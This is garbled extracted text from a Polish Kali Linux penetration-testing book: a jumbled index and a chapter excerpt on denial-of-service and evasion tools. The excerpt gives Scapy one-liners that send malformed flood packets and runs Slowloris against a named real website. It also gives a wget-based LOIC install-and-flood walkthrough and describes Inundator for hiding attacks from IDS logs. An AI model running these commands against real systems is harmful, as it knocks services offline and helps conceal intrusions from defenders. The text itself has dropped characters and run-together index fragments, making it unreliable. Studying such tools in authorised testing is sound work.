Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 38: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

